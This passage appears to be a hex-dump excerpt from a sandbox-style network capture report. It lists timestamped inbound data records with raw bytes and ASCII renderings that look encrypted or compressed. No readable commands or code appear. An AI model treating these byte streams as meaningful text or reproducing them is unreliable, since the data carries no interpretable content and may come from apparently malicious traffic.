1a 99 97 6f 63 Data Ascii: \|BBr:A%`OPUg\D~K=v\n`1s6.!90NA=f@#ba]l6;1'_~o&3D'BPsUb SF\|Lk$&0w#>d=R2qRt{;,EV+p#c2n8@![tMVU+WWoroc
2023-10-13 13:21:16 UTC	9886	IN	Data Raw: b9 7d fc a9 9f e2 3f 5c 27 98 04 a4 ba 11 f1 80 48 2e 7b 46 ac 1d e4 8c 2c c7 69 9e b1 32 20 66 bb e8 46 bf 6a 46 cf 9d 29 74 0d c0 fc 5b a2 8c c9 31 93 e4 8f 18 66 c2 6f 58 e2 18 2a 0f 33 c2 cc ef 0b a7 94 a5 00 b6 be a3 80 e1 b7 76 86 41 f2 29 69 b2 4d 3c ac 1d f8 83 84 0f ce 45 fb 54 77 b0 9c 62 f5 64 59 f6 57 af be 91 f3 61 bd af 70 86 7e da 21 e1 d2 0b d5 db 6a 1d 87 e4 b6 4a 2a 4e d7 e4 6d 9f 48 c7 47 fe 43 ac 05 3a 1c 19 85 c5 8f cd c9 12 e5 c0 d6 16 3f 15 13 42 d9 f0 51 97 2b fe 4b ff 36 4f bd b8 36 cf cb b8 8d af f7 8c 8c 6b d3 5e 31 20 d8 88 ec 11 5f f7 85 24 a4 00 80 61 eb 7e 55 12 55 52 31 67 53 08 f4 dc 9c 4d 5d c1 e3 db 01 9b ad 99 d8 b1 43 be 49 c4 80 3d 38 3a 0e d6 82 d3 42 4d 4c 78 a3 8a f8 52 4e 32 95 70 89 0b 7b 1e ca 39 0f f3 74 4f 33 Data Ascii: }?\'H.{F,i2 fFjF)t[1foX3vA)iM<ETwbdYWap~!jJNmHGC:?BQ+K6O6k^1 _$a~UUR1gSM]CI=8:BMLxRN2p{9tO3
2023-10-13 13:21:16 UTC	9902	IN	Data Raw: c3 89 7c 07 bb ce 1a 8b 5c 00 dc c7 38 9f 28 50 01 a2 31 e8 36 fe 40 8c 16 4d 61 5b 7e 8c ba 8e 52 c2 8b 4d 6c 5b 83 52 08 22 c9 63 0c 9f 78 fd 08 11 d5 50 dc b7 6a 3f d8 5f 61 2c 82 4e 53 e1 e8 9d 82 f2 97 64 79 1c e7 e1 4e 39 d6 26 44 56 c3 11 50 93 f6 ea 81 b1 93 38 9c 74 43 66 49 cf 58 3f 90 6a 2f 53 19 34 02 c8 90 d0 09 29 4a 44 7a 3b a9 00 70 24 b8 b3 d9 32 02 2d e2 03 1e a8 07 51 89 29 8a 4e eb 94 c3 34 06 b6 81 19 2b 66 20 f1 38 84 d6 51 cd 1f 8d 1a 65 c2 48 e9 18 c5 4b e5 0e 4f 5e 5b 43 36 1f af 67 48 2d ec 93 61 9c 08 12 0d 3f f4 2f f1 44 ae 15 51 a2 d2 13 9a a7 36 63 dc 66 ac 2b d7 25 1f f8 1a d6 5f a8 80 95 77 3d c0 7a ff 7a cf a5 59 ac 23 8a 48 5f e1 06 25 a6 68 a7 0f a4 59 dd 7a 38 4f 90 ef b8 01 6b b3 fb 8c fc d8 1e 03 a6 16 f9 15 dd c9 ec Data Ascii: \|\8(P16@Ma[~RMl[R"cxPj?_a,NSdyN9&DVP8tCfIX?j/S4)JDz;p$2-Q)N4+f 8QeHKO^[C6gH-a?/DQ6cf+%_w=zzY#H_%hYz8Ok
2023-10-13 13:21:16 UTC	9918	IN	Data Raw: a8 f5 56 fc 08 9c 8b 07 80 bf e3 73 69 ff 12 52 8a ba 06 4c a2 cb fd 9d 77 9f 6f 38 43 72 a6 b9 58 59 8f 77 cc 27 b6 1e c7 12 5a cd 58 8e 18 53 28 ec fc 8b a2 c8 6e 9b f0 c2 70 12 e0 47 56 82 0e c0 4f 3e 8c 5f 2e df e7 bb e7 6b c8 ed bc 83 16 a2 2d c0 80 88 6d e9 25 05 43 9e 6f 40 28 47 71 dd 66 43 80 44 5b 40 56 15 3a a7 f9 f9 f0 94 fd 7f 0a c3 06 91 e2 76 5f dd 5e 3a 79 a5 1e f5 59 5c f7 52 26 b1 f6 2f 0e 8a de 75 d6 c0 2a f0 97 7f 58 cb a1 ac 6f b7 05 cc 43 82 09 a1 dd f5 ab eb 82 e0 bb 0f e5 e7 52 25 72 99 ff 97 49 0a 95 87 e8 95 d8 a0 11 d3 85 d6 27 98 5d d5 15 cc b4 f1 16 ff ac 36 9f 91 f5 98 38 d6 b0 a8 cc 83 80 26 f3 43 a6 a2 fa e7 7d bc e5 87 c9 d1 ad 18 9a 95 53 67 6e 0c 08 94 fa 94 68 09 e1 3f d0 93 c6 fe 00 48 15 87 b1 b4 63 37 84 ad 03 c6 64 Data Ascii: VsiRLwo8CrXYw'ZXS(npGVO>_.k-m%Co@(GqfCD[@V:v_^:yY\R&/u*XoCR%rI']68&C}Sgnh?Hc7d
2023-10-13 13:21:16 UTC	9934	IN	Data Raw: 5e dc 57 5a 89 ba 65 4d 53 6f af 32 a6 bb 53 92 99 e8 e5 8d f3 93 f8 f5 9b 60 a2 87 63 2e b6 39 4e fe aa 72 23 46 28 e7 13 7f 5f 86 0c 62 56 97 c0 c5 68 36 80 eb f4 73 34 88 04 f4 80 12 29 80 65 78 97 12 b6 36 4f 6b 2a ad f6 d6 d6 e7 d1 88 a5 0d 4e cc 8d dc db db 9a 57 b6 3d 19 1d 0e a5 01 2f a6 ca fe 9f 67 ab 57 74 6d b9 e2 bd 88 67 2f a0 a6 c7 be 3d c3 d4 cd a9 33 dc 6f 38 25 1c 38 c9 bf a4 2b de f5 06 20 b7 9c 9a 8d b9 d9 cb 98 24 2e 7a 0c f3 c3 e6 f8 98 6c ce 0f 2e a6 b7 dd 0b 03 9a 77 a0 63 0f e4 cc 79 33 13 70 3b b6 49 d7 00 40 d9 dd ee 77 8e 43 ab 0c 57 ea d0 9a a4 4f 83 d1 42 c7 1e 9c 97 05 d7 58 7a 0a 98 c5 09 37 61 42 38 44 92 34 d3 a4 13 e5 02 bf 01 ec 23 cc d4 a1 62 24 75 06 9d 99 52 61 4d a5 4f 79 d8 9e 31 43 1a ea df 4d c6 3f 7a 22 dc bd 64 Data Ascii: ^WZeMSo2S`c.9Nr#F(_bVh6s4)ex6Ok*NW=/gWtmg/=3o8%8+ $.zl.wcy3p;I@wCWOBXz7aB8D4#b$uRaMOy1CM?z"d
2023-10-13 13:21:16 UTC	9950	IN	Data Raw: 1a ad 67 09 7f 20 cf 57 36 44 db d6 b1 e1 dc 37 d6 a2 ac 63 44 05 76 59 3a 4e e2 80 17 33 4f fe 2d 50 8e c7 04 93 04 16 b5 fa 39 1f 93 be 5f 8f 91 f6 7e 95 47 f3 88 93 1e 4c be 59 d4 23 93 86 40 3c 3f 1f 1f 03 68 1c 29 1e 92 1e d7 ec f6 72 fb e5 82 97 b4 34 f5 9d d7 66 04 d8 2c ca ba 0b 5d 21 94 77 a6 cf 89 11 d5 94 a6 aa 1b f4 3f 59 f6 4b a2 ba ef 15 6e 80 bc 61 1e 8e c8 0c c8 a8 8d 49 62 f3 83 9c 10 af d9 45 5a 89 cb 7e e6 ee aa 94 5c 2f 7d f5 f2 f5 b3 98 85 d5 23 20 88 7e b2 94 ef 6c 69 bf 7c 49 61 f1 8f 93 cc f6 62 4e 56 ab 9b 7c b1 4c d9 79 ee f3 1d 5e a3 06 eb 06 71 8c 08 5f 16 91 01 cf 08 fd 33 78 05 f1 72 68 9f be 15 63 49 08 05 86 00 71 a6 bc c7 5e d6 7c 04 a6 a7 4c 81 00 0f 42 ee 61 2c a0 c1 bb fb 0b f7 82 e9 e2 bc b9 38 17 42 64 68 d6 87 94 a4 Data Ascii: g W6D7cDvY:N3O-P9_~GLY#@<?h)r4f,]!w?YKnaIbEZ~\/}# ~li\|IabNV\|Ly^q_3xrhcIq^\|LBa,8Bdh
2023-10-13 13:21:16 UTC	9966	IN	Data Raw: f0 74 31 88 b6 c5 8c ea da dc d8 25 14 1d a1 d8 49 75 a6 bb 28 f0 37 7c fb ca 98 c3 16 b6 cf c1 3d 6f a3 85 f8 20 d6 e4 bd 6e a4 e7 5c 35 09 0c 62 30 e9 eb 33 d9 ee 5f e0 e7 5b 21 0f d1 a0 3d b2 4c 16 1f aa 71 e3 d4 8e a1 5e ea 76 2b bb a9 98 8f a8 67 aa 4b 53 13 42 8f 25 8f a6 b0 e6 95 2a 85 18 5a 45 02 fa 7f 89 2d b7 fc 76 07 0e 28 a2 25 08 8b 88 86 2b fe 7d cd a9 47 10 d4 35 d8 bd 22 02 72 c9 78 e5 31 de 72 68 ae fd 1e a7 6f 4b c5 09 0a 38 37 09 f3 64 94 36 b7 01 3a a0 21 ce 54 8d 73 7c c6 14 87 6f d2 7c 7b 8c 00 74 ba ad 8d 00 9b 79 98 7e c3 8b 34 0a 2c 9e 13 38 dd 06 51 e5 4a 06 49 09 b8 15 b8 1e 21 36 c1 f6 07 91 17 08 f1 96 51 9a 19 1a d7 cd f0 8c f9 3d 40 62 01 6e 98 b2 e4 86 d5 1a e9 ee 87 d0 c7 f2 8c d4 03 03 68 4d 28 9d c6 f0 36 58 e7 32 d7 94 Data Ascii: t1%Iu(7\|=o n\5b03_[!=Lq^v+gKSB%*ZE-v(%+}G5"rx1rhoK87d6:!Ts\|o\|{ty~4,8QJI!6Q=@bnhM(6X2
2023-10-13 13:21:16 UTC	9982	IN	Data Raw: b0 43 d0 3f db ae b0 1a 45 aa 30 7d a9 64 87 77 5a 2c 9a 39 cb 25 27 37 da bf cd 53 c8 ac f3 14 4e a4 a7 71 1a 4f 71 03 c6 7e 6e 9b 2d 49 8d ad 36 0e f6 5d bc cf 9a 70 c8 34 a9 ba 11 2a 93 6b 0b 38 d8 13 18 b8 2e 97 fe 66 e2 24 ac 6e 17 50 22 fa c0 c2 f0 33 2a ac 01 55 f6 97 c5 67 35 58 50 c2 3b 85 64 a5 ea d4 7b 71 fb 1a 38 0c 73 0a 5b fd ea af 76 f9 4a 25 00 ab a5 a2 b2 3a 99 9b 60 26 03 00 b4 91 84 98 c3 b7 c3 9f 22 b1 11 87 42 51 8f cb 8a a6 02 ec 67 37 cc 56 89 19 71 bd 8a 06 ae a9 d0 43 7c 15 e1 5a 94 61 2f 42 56 12 5b 7e ac b9 7f 3c 96 e6 78 bc 49 62 28 04 89 8f 77 ae 99 a0 b1 54 56 0c 8c 0f 92 f4 2a 21 28 0a a0 81 76 c5 c7 54 85 81 e7 09 bf 09 b0 d3 22 c3 7a 59 1c 5f 97 d2 1b 27 9e 76 fb 49 22 0a c8 d1 d1 c5 ac 2a 34 b9 14 7f 31 19 8c 89 8c 19 f9 Data Ascii: C?E0}dwZ,9%'7SNqOq~n-I6]p4k8.f$nP"3Ug5XP;d{q8s[vJ%:`&"BQg7VqC\|Za/BV[~<xIb(wTV!(vT"zY_'vI"41
2023-10-13 13:21:16 UTC	9998	IN	Data Raw: b6 55 29 b2 87 10 94 33 4a b6 f1 b2 6b e3 d4 a8 92 0f e9 fd ee 35 18 ae 81 ca b9 ea f1 d5 9a 61 a5 f8 2a 55 70 74 20 3b f3 5a 3c f5 92 11 99 71 25 6d 37 74 e6 d0 1c 22 f3 8e 1d df 08 20 f6 c1 e4 c9 f4 fa e3 34 e3 59 f6 eb 81 a1 1f 5a 47 40 6f bc 22 80 3d 08 6e 8d ae ca fb 26 56 fa cb a3 2c 3e 37 18 2d 81 14 ab ad a3 9f 09 a5 52 51 17 e7 c3 2b b9 84 03 64 4a b8 98 04 db ca 6d fa 5d 09 2c 05 66 95 0d fa 24 c5 49 3d c8 52 9d 5b 62 80 02 5e c3 5d ed 9b d1 4f ec 0e 7c f7 99 6e 5b 8d 97 22 7a 96 28 60 e9 7d ce 80 c4 05 14 d1 46 ce a0 9c 11 3c 91 75 50 28 e9 01 04 52 b7 ca cb 1f c5 04 1f b3 83 1b 3b 34 35 41 89 5c f3 7b 81 3d df a8 fa 93 65 5d 9c 16 39 5a 34 be af 97 be bf ae 8b 0a a7 8a a0 ef b7 28 41 4f 2d 3f c6 03 c8 02 bc 55 b9 f1 9a df 10 b6 bc 30 20 45 ce Data Ascii: U)3Jk5a*Upt ;Z<q%m7t" 4YZG@o"=n&V,>7-RQ+dJm],f$I=R[b^]O\|n["z(`}F<uP(R;45A\{=e]9Z4(AO-?U0 E
2023-10-13 13:21:16 UTC	10014	IN	Data Raw: 51 3f 5a 1f e3 17 10 55 79 a8 4e 8f 92 cf c2 00 c3 53 dd 8c b8 18 53 a5 aa 39 31 8b 07 f5 48 c2 dd a3 22 40 cc 05 eb 88 a5 b7 ef ac 0b d5 19 8a 1d df 84 32 b3 78 c4 13 75 8b 94 04 9e 82 28 68 b4 7e b1 8d b6 9c d2 cb 29 fc b6 74 e5 ee e6 47 6b 33 08 1a 9f c6 8e d4 40 af b7 72 2e 39 d9 ad 1b 72 87 a9 5d d8 00 d3 ff 8e 98 37 4f 14 12 0b c5 31 54 43 05 08 00 a8 1d 85 ab 65 58 7f 38 b9 3d ba 84 7d 04 5c 8c 21 4d 5c 47 3e 7c 9d 1a fa 62 44 8b 4e 02 64 df 92 9f 73 2f 2a 2d c5 53 bf bf 74 81 b8 c0 0a 4b 23 ee 97 dd e7 50 31 8c d4 ec 23 6c 5d 76 58 79 14 61 c1 87 b7 33 5f d3 bd 16 73 77 06 4c cc 0b e0 21 79 0d 8f 93 06 c9 79 42 a4 41 3c 38 a9 9f 17 99 a6 81 6f 60 33 99 ce f9 c2 93 a4 e9 5e e1 17 33 03 5c 45 e8 5a 3d 50 ef 76 87 2c c0 ce ce aa 75 1c 9e bd 45 33 61 Data Ascii: Q?ZUyNSS91H"@2xu(h~)tGk3@r.9r]7O1TCeX8=}\!M\G>\|bDNds/*-StK#P1#l]vXya3_swL!yyBA<8o`3^3\EZ=Pv,uE3a
2023-10-13 13:21:16 UTC	10030	IN	Data Raw: 1e f9 6c c9 d0 a3 ab 08 65 73 10 11 47 38 83 4b 64 39 3e 1c cc 18 16 85 d6 6d 85 24 1c a9 e7 96 99 2b b3 75 ff 5a 4b 64 3f 2e 61 fe d6 ad 56 74 b1 34 01 79 e5 b1 35 2a 09 21 4f d6 92 ef 2e f5 b0 61 a9 fc 19 87 3a 8b e6 0f 0d 3d 9c 3c 39 cc 42 a3 ad 6e 10 0c ff f7 49 0c 57 0a 0c e4 d0 c3 a2 68 b3 12 f1 15 a9 98 fc 2f 86 45 a7 89 5b 00 06 98 4d c2 8a ba a9 72 77 57 2a 01 bc a4 4d fe 18 d7 75 30 e4 d8 ec 65 50 2f 49 ec 63 bb e0 00 d1 fb 02 87 8e f9 78 53 c8 77 f8 18 84 79 ba b3 ac df 71 e1 14 3b f9 bf d8 ef 00 15 e6 16 96 6a 63 6a e1 45 38 2b 0a f4 f7 1f 2b 38 72 b0 60 b2 bc fa 53 c3 be 9a 65 ff ab 99 fb 74 30 30 06 55 01 be a2 77 45 8a 29 fe 25 5b db 62 70 f0 a3 ca 61 ea 50 80 c0 0f ed 58 fb 93 08 aa 22 33 b3 6e 41 a5 fc 37 c2 76 f6 35 6c ba af 95 a0 98 6c Data Ascii: lesG8Kd9>m$+uZKd?.aVt4y5!O.a:=<9BnIWh/E[MrwWMu0eP/IcxSwyq;jcjE8++8r`Set00UwE)%[bpaPX"3nA7v5ll
2023-10-13 13:21:16 UTC	10046	IN	Data Raw: 91 b5 20 77 03 f1 f8 48 5b 54 46 79 e6 d4 6f 3b 1b 2e 23 f9 a7 6b e6 6f 56 9c de 90 ee d7 ed ac 06 75 ec 8c 08 2d 12 7c f3 77 e7 81 fb ad 1b fc c4 99 10 64 4c a7 1a 0d c0 fb 9b 25 55 97 02 da 2a ae c7 2c 32 60 96 ec fd 4b 93 b5 51 0e 5f 19 3b f3 51 2a f8 f5 f5 0b d9 49 bf 2a 4c 45 a1 8e 00 11 29 c4 de cb 2c 84 e3 33 d0 61 8b 4f ea 7c e1 0e 49 83 ef 0b 36 34 aa 24 97 32 2b 4d dd 47 c1 78 26 18 cf 2e b3 d8 e7 69 31 04 68 e8 ca 56 a4 28 9e 6f d3 a2 4a 9f 2d 89 f5 72 52 33 0a 0b c3 62 f5 ba 03 9b 8f 68 a5 35 67 d2 cd 89 73 58 d8 8b 95 4b 18 23 9a e0 b2 cf 00 30 51 00 45 bd eb 60 3c 99 1f 47 b9 7e 17 3f 45 0c 1a 9d 9c c8 d6 9f 53 52 91 48 21 53 1e 1d 93 d4 41 5c 63 0f 02 cd fe 24 2a f4 42 cb f2 77 82 ac 6c bf e7 cd 0f 60 d9 b5 f3 87 70 98 5c 07 60 63 0f 36 4f Data Ascii: wH[TFyo;.#koVu-\|wdL%U,2`KQ_;QILE),3aO\|I64$2+MGx&.i1hV(oJ-rR3bh5gsXK#0QE`<G~?ESRH!SA\c$Bwl`p\`c6O
2023-10-13 13:21:16 UTC	10062	IN	Data Raw: 76 be ff 53 9c 3e 02 47 df 18 64 61 dc 89 c7 71 ed d3 b7 82 15 85 e5 96 d5 85 42 f9 1f b6 4d 83 62 97 01 3a c4 ac c6 7f 49 20 12 8a a9 04 1d 6b bf 99 db 60 73 c9 e2 4c fb 18 b8 ea 7e 33 48 d3 31 f1 73 d0 3c 98 b7 77 4f 20 bc d2 b2 ce 54 30 95 22 64 89 45 d4 63 ba 27 5b dd 55 e4 47 a4 d5 7f 9b 7f d7 8f 43 38 da 24 10 e7 14 9c 59 6b 81 db 1c 28 58 17 78 e2 6e 2a 2b 98 fa 70 ab 94 20 73 df a2 1d 32 ed 63 6c b0 8e 74 27 5c 4f ef 36 a7 67 c9 c9 fe 54 03 e4 ad 9f a0 d4 d3 1c ba 8c f5 b3 3a 86 88 e6 f0 f0 5d 6a d9 7b 4f b2 d9 2a ad 52 55 a6 08 26 99 e8 55 10 96 43 63 03 c8 c2 d0 93 ed 51 aa 03 2a 35 e0 23 a2 33 73 62 80 35 5b 0b 1c 52 6c cc be cc 8e 89 d4 82 af 95 dd 57 39 61 85 bb bd 16 9b 8c e2 68 54 e7 10 f2 c6 fb 45 3e 04 ec b3 2b 5b a3 b0 b4 52 0a f5 9a b6 Data Ascii: vS>GdaqBMb:I k`sL~3H1s<wO T0"dEc'[UGC8$Yk(Xxn+p s2clt'\O6gT:]j{ORU&UCcQ*5#3sb5[RlW9ahTE>+[R
2023-10-13 13:21:16 UTC	10078	IN	Data Raw: 08 57 6f 59 fe 2d c5 1f ae 0c 21 89 3d 39 bf 35 43 b3 12 60 7f 5b 44 0b 93 2f ba c8 dc 09 ba 7c fa 7b f2 eb e2 dc 4a 0d a8 fa f9 10 0e 68 11 f1 3f da 3b 09 67 48 68 54 af 72 a6 b4 18 e5 6d 6e bb 7d 65 2a 38 73 22 7b bc 6d a9 5e 8b 7f bd 61 59 97 6c 06 35 df 85 eb 48 3c ac 55 a3 79 92 b7 31 b1 ef f9 4b 49 25 b2 d3 ac 29 0c 52 fd d8 38 37 2e 2b 2e e1 67 3f 90 ca 91 5e 8e 8d 85 5d ba 64 f1 ee 42 4f e3 2e 1c ae 88 67 ea 40 58 ae 40 8d 30 1b 29 7d d8 bf ca 34 3f 20 e1 de 61 f9 05 32 8f 5c 96 a0 39 a9 e2 c4 8f 1b 0a ef 40 e0 76 bc 61 72 b0 08 88 28 8a 21 6e d1 31 84 ce 05 4f ab 65 9b fc d6 86 f4 9d 7a 07 d6 e1 07 02 3a 30 50 0b d9 60 a7 06 ec e8 87 98 42 b9 05 c5 98 e0 ff bb 46 99 15 8f 24 c5 89 3b ea e8 c9 46 37 f7 96 4b 6a 22 85 36 b8 7d 6a 22 46 16 6e 13 6d Data Ascii: WoY-!=95C`[D/\|{Jh?;gHhTrmn}e*8s"{m^aYl5H<Uy1KI%)R87.+.g?^]dBO.g@X@0)}4? a2\9@var(!n1Oez:0P`BF$;F7Kj"6}j"Fnm
2023-10-13 13:21:16 UTC	10094	IN	Data Raw: 87 94 ed eb 36 d8 dc 3b bd 32 d0 6b b0 17 32 86 12 e3 27 3a 65 96 fb c5 fd 88 e0 bc ed 1c 9f 5d 05 84 f9 9c f1 a8 67 90 91 72 4d 9b b0 26 45 03 87 cc 91 9d f9 c9 8d c9 47 78 70 31 26 5c e2 d4 ac 10 28 78 a6 f8 68 57 02 ea 34 8d 64 1c b5 ad e7 3c 14 44 d2 4c 0e e3 37 a1 ce 80 71 47 3b 0d 4f d0 2b ca 50 33 c4 06 a0 a4 11 d7 32 98 8f e7 20 b0 40 55 5e e1 df 0e 65 83 43 24 f1 43 d3 b9 2a 17 37 7c 86 6d 32 c1 c1 35 73 aa a0 aa 92 7b 37 a8 4c 2e 24 e5 ca e7 7c d6 c3 f0 0e a6 28 42 7f a9 90 ab 34 f4 f6 c5 15 f0 b6 26 05 b2 76 23 0b 79 79 32 f4 e9 fb 0c d6 8e 4e f3 28 12 11 01 b2 f5 69 bb 67 98 24 30 63 bd 75 ca 96 d8 01 6b 8f 03 54 30 9c 83 8a b0 13 66 92 01 fb 8f f8 63 a2 c2 8c 13 6c 6b 1b 92 56 35 e7 b7 1d 6f 9e c6 96 30 28 a3 b9 fb 46 02 84 98 6d d7 70 78 1e Data Ascii: 6;2k2':e]grM&EGxp1&\(xhW4d<DL7qG;O+P32 @U^eC$C*7\|m25s{7L.$\|(B4&v#yy2N(ig$0cukT0fclkV5o0(Fmpx
2023-10-13 13:21:16 UTC	10110	IN	Data Raw: b4 0b f0 aa cd 58 a7 9d a1 35 5a a3 a5 67 dc 32 a0 d5 d8 fe d2 42 e3 23 fb 48 c5 d5 3e 41 39 1c b6 ad e3 30 7b 1f b1 06 b3 aa 60 b5 8f 95 4d 91 4e 8e fd b6 de 23 29 fc 5b 3c cd d6 5a fc ba 75 4d 81 a6 4e f4 f9 1e 2a 55 71 d4 6e 99 dc 20 0b 51 d4 c3 28 3e 0a 8b 52 07 5c 01 5a 79 ac 59 00 ab 5e 4f 84 3a 76 f1 ed 14 87 77 85 ee e0 37 1b 2f 0f b9 89 51 f0 b6 8d 7a e5 cb f0 82 7d f7 ec 37 a7 0d 8b 6a eb 4d 4e d7 dc 12 02 54 24 a8 ce c7 16 7e d8 cd dd 54 e1 c8 c4 e2 e2 f2 eb fb 51 ac e7 fa 96 ba 4e 52 d0 28 93 d4 ea a7 41 6c 4c b7 a7 76 06 13 d9 b9 a8 f9 e7 9c 54 32 fd b7 1e 1a f8 fb 21 75 8a e2 10 67 dd dc 87 4d f2 1f 50 69 59 f1 a9 f3 83 72 d4 6c 78 06 3f df f8 b8 a6 20 03 93 05 01 97 e6 9e c1 d6 84 8c 72 bb be ce df 91 c2 7f c4 1f 81 79 bb ee f5 09 47 1c 72 Data Ascii: X5Zg2B#H>A90{`MN#)[<ZuMN*Uqn Q(>R\ZyY^O:vw7/Qz}7jMNT$~TQNR(AlLvT2!ugMPiYrlx? ryGr
2023-10-13 13:21:16 UTC	10126	IN	Data Raw: a1 61 38 7c 23 05 20 c2 51 80 b4 21 44 c6 e5 b8 e1 5b 24 54 59 cc 34 7d 74 f5 d0 be d7 3a e1 cb bd 1e 28 c9 f0 de 4e b3 b1 6e ca ae af 14 22 12 63 c3 cd 0f 40 87 9e 7f 31 16 b2 e6 aa fe 90 17 ae 62 bb c9 fb 52 48 0a 70 24 f9 dc ee f1 d2 66 a5 cb 14 bf 88 8c 2c e3 89 c3 f6 ff 58 e5 03 97 6d 99 ac f0 ce 87 e3 e8 fb af d4 5c 97 f0 e4 90 eb 06 dc 7c bd 37 82 53 90 48 63 91 87 1f e9 96 2d 82 b8 5f 64 82 45 3c bc 09 97 01 dd 37 f3 eb 98 8e 47 9b a8 2d 77 33 d3 06 19 14 54 28 43 e8 f3 6c 2b b1 4c 60 f1 0c 8d a5 f2 bd 28 b3 86 c9 1d c3 f7 32 3a 52 69 19 07 9f 0b d5 e9 2a cf 4f 06 5e a6 fe 56 c1 66 86 a4 27 0e 99 2f 63 b7 6c 4d 23 ee 30 ac c7 7a 87 5f 1c d8 fe 8c f9 1b c0 86 df 78 0a 86 0a 2e dd 11 38 b9 51 6b de 7e 62 7e b1 1e 62 65 7f 68 0e 96 22 6a 23 cd 3f 39 Data Ascii: a8\|# Q!D[$TY4}t:(Nn"c@1bRHp$f,Xm\\|7SHc-_dE<7G-w3T(Cl+L`(2:Ri*O^Vf'/clM#0z_x.8Qk~b~beh"j#?9
2023-10-13 13:21:16 UTC	10142	IN	Data Raw: c6 30 95 59 cd ff 0f 88 08 b4 02 03 80 75 c2 f0 fe 2b 2a 1b 95 6d 60 22 1a 0c 3c ad 4a 4c df b1 eb 15 be 7c e7 83 4d 12 fb 63 d7 44 e3 8e d6 85 58 38 09 1b ea 06 6f e8 25 d3 1e 30 8d 19 48 9b 56 0f a5 9b f1 fd 4f 73 d2 ca 33 5f 24 09 e2 05 08 86 6e c2 28 7d 2e 45 d8 d0 4a bc c9 22 83 0a 73 cb 57 ff 84 b9 64 9a ac a8 09 47 77 df 4a 2a 43 ff 8b 46 98 be a2 b7 e7 7d 83 23 6a c1 84 3f de 86 a7 04 35 1f 00 ec a8 d8 2e af c9 01 2f d5 82 e4 dd ca 75 4f 65 ec 99 cd e7 d1 e7 78 35 21 a5 30 ef ee 25 8c b4 da 45 f9 47 6e f9 e4 38 57 c9 08 56 bd a7 fb 84 8b c3 76 66 38 b0 a9 ea 0a 0f e7 90 25 30 d7 d9 15 fc 16 f4 7a a7 56 8b b8 e7 8d af 31 d3 31 f5 11 64 dd 1f cc dd 35 2c 02 0a c5 8d af 2c ab 64 a4 50 f9 49 e4 94 ee 4f 02 c2 42 9d 0e 8a 1d 1d 83 94 d3 01 3d b3 39 f0 Data Ascii: 0Yu+m`"<JL\|McDX8o%0HVOs3_$n(}.EJ"sWdGwJCF}#j?5./uOex5!0%EGn8WVvf8%0zV11d5,,dPIOB=9
2023-10-13 13:21:16 UTC	10158	IN	Data Raw: cb 4d 6c 72 13 cc 81 13 36 3d 9e f7 8a 3d 97 48 45 36 27 47 22 88 c8 be c1 56 ab 11 d4 84 b2 50 2d cd d9 04 5a f5 53 57 70 9a 74 c3 1a 8b a3 0b f9 36 0e 6e 38 38 25 e9 b3 2f 19 b5 af f7 74 60 f1 40 ff bd 1e 67 d5 64 bd c1 c7 93 be a4 70 fe e5 9c 30 34 14 31 71 f8 be 59 3f bf ed ad c9 e6 be 40 35 aa 71 fb 46 94 88 ff 7a 06 04 35 49 31 d9 c3 5a 4a 7a c1 35 a0 ed 78 97 01 59 17 c4 c2 e2 3a dd 5b a5 e4 24 6a b6 bd 45 3e dc 07 24 58 2b 91 8e 48 35 72 9e db 27 39 a5 12 c6 8e 89 3d f7 d8 5f 58 14 de 00 1a 58 80 a8 d7 b5 15 99 98 56 aa 6a 1d 1f 9f 2c 7d 92 52 49 aa 13 2e c2 3e 02 d8 9c 06 67 65 e1 67 1e 9d 61 1c 68 18 35 39 a5 d2 d3 d3 28 63 a0 84 53 eb 7e 8d 70 27 88 3a 68 ea 22 ef 88 4b 49 0f ad 67 f4 71 0a 1d 9c 50 f7 0b ef 76 b2 19 ab f6 92 2c 8c 3e 51 13 30 Data Ascii: Mlr6==HE6'G"VP-ZSWpt6n88%/t`@gdp041qY?@5qFz5I1ZJz5xY:[$jE>$X+H5r'9=_XXVj,}RI.>gegah59(cS~p':h"KIgqPv,>Q0
2023-10-13 13:21:16 UTC	10174	IN	Data Raw: fa fe 70 f6 37 86 24 2d 43 71 ed 0f f5 a6 68 be 3e 90 c6 8d 6e cc b1 c1 65 0e fd a8 be c0 3e e6 8d a6 cb 48 80 f6 d8 aa 68 ef d2 d8 3b 13 5b 9a 21 a9 66 58 dd 65 8a 9f e5 11 28 3c 3b 30 60 92 6f 08 16 f0 c2 a0 eb 94 d0 03 79 88 ab 13 d7 e9 63 a5 aa 5a 37 63 d8 5e 80 cd 72 24 cc 55 b3 52 b9 2f 7f ba 52 5b 8b 42 7a ea 28 5b c2 92 5b 5b e4 98 9b 5c e9 3c 80 3d 16 14 cb bf da bb df d1 c0 8b 96 c0 2e 78 a4 e7 e6 80 5c e9 a0 5d aa 3e da 72 67 d5 96 29 d5 3a 05 36 c6 b6 53 8a f5 0b bc 1c d0 bf 5f d3 2a a6 d6 c0 91 23 58 a9 7a af 8b ef 65 f9 b5 f4 3e 2a 1c 27 42 34 9e e7 02 73 95 0d f0 58 10 bd 46 a4 c0 25 89 21 bd 6f 81 52 e5 43 bf 5f be c2 e6 dc 49 2e 89 e4 26 ef ae b2 df 5f 8d 18 13 c5 f0 82 4c 1c 6e fe 4c d3 b1 78 92 8a 98 79 a6 65 98 de 0a 71 c4 5c f5 b4 cf Data Ascii: p7$-Cqh>ne>Hh;[!fXe(<;0`oycZ7c^r$UR/R[Bz([[[\<=.x\]>rg):6S_#Xze>'B4sXF%!oRC_I.&_LnLxyeq\
2023-10-13 13:21:16 UTC	10190	IN	Data Raw: e2 e4 36 d2 2d dd df a4 10 de 1f 57 f2 c7 b0 fd e4 4c 16 f1 6a d4 57 cb 77 fd 6f d7 e9 36 90 8c 07 b7 02 43 a0 fe 33 40 8f e9 3b 28 56 91 ec cd 13 27 96 aa ed 9c 46 cf 48 68 20 03 2b bf 30 0f 63 75 c7 97 da e0 25 6c c5 37 4d 87 0e 99 fa 35 ce 14 16 86 ad 8f 78 db 42 07 8a c0 be b5 99 83 46 dd 0d 88 61 77 5f 76 47 00 75 2f 2c 83 4d 61 04 29 8a ae 66 f9 be 53 d3 54 64 a7 1f 01 d0 54 cb 10 99 b8 6f 55 9c e4 7a e9 a0 00 5d d4 a5 87 18 5d cc 04 48 a8 1e 4d 83 1d 1b cb 9e 1d fd c2 05 ec 37 92 a4 be 3f 2d 79 93 a5 20 90 f2 a5 74 1a ae 6a 85 3c 70 7d e0 9f d6 2f 91 72 a0 b7 10 1e 4c 01 23 67 28 ff 36 82 86 36 74 a5 8e b3 ad cf 72 54 cd bf 2e 8d c6 a0 c5 38 4e ea 72 3b 9d d9 8f 4b c0 6b 